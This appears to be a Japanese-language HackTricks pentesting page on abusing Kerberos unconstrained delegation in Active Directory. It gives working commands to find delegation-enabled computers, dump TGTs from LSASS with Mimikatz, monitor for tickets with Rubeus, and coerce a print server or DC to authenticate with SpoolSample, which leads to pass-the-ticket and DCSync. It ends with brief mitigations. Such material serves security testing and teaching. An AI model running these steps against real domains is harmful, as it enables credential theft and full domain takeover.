# Unconstrained Delegation {{#include ../../banners/hacktricks-training.md}} ## Unconstrained delegation これは、ドメイン管理者がドメイン内の任意の**コンピュータ**に設定できる機能です。次に、**ユーザーがコンピュータにログイン**すると、そのユーザーの**TGTのコピー**がDCによって提供される**TGS内に送信され**、**LSASSのメモリに保存されます**。したがって、マシン上で管理者権限を持っている場合、**チケットをダンプしてユーザーを偽装する**ことができます。 したがって、ドメイン管理者が「Unconstrained Delegation」機能が有効なコンピュータにログインし、あなたがそのマシン内でローカル管理者権限を持っている場合、チケットをダンプしてドメイン管理者をどこでも偽装することができます(ドメイン特権昇格)。 この属性を持つコンピュータオブジェクトを**見つける**には、[userAccountControl]()属性が[ADS_UF_TRUSTED_FOR_DELEGATION]()を含んでいるかどうかを確認します。これは、‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’というLDAPフィルターを使用して行うことができ、これがpowerviewが行うことです:
# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser: /interval:10 #Check every 10s for new TGTs
**Mimikatz**または**Rubeus**を使用して、管理者(または被害者ユーザー)のチケットをメモリにロードします。**[Pass the Ticket](pass-the-ticket.md)**。\ 詳細情報:[https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\ [**Unconstrained delegationに関する詳細情報はired.teamをご覧ください。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation) ### **Force Authentication** 攻撃者が「Unconstrained Delegation」を許可されたコンピュータを**侵害する**ことができれば、**プリントサーバー**を**自動的にログイン**させて**TGTをメモリに保存**させることができます。\ その後、攻撃者は**チケットをパスして**プリントサーバーのユーザーコンピュータアカウントを偽装することができます。 プリントサーバーを任意のマシンにログインさせるには、[**SpoolSample**](https://github.com/leechristensen/SpoolSample)を使用できます: ```bash .\SpoolSample.exe ``` TGTがドメインコントローラーからのものであれば、[ **DCSync attack**](acl-persistence-abuse/index.html#dcsync)を実行して、DCからすべてのハッシュを取得することができます。\ [**この攻撃に関する詳細はired.teamで。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation) **認証を強制するための他の方法は次のとおりです:** {{#ref}} printers-spooler-service-abuse.md {{#endref}} ### Mitigation - DA/Adminのログインを特定のサービスに制限する - 特権アカウントに対して「アカウントは機密であり、委任できません」を設定する。 {{#include ../../banners/hacktricks-training.md}}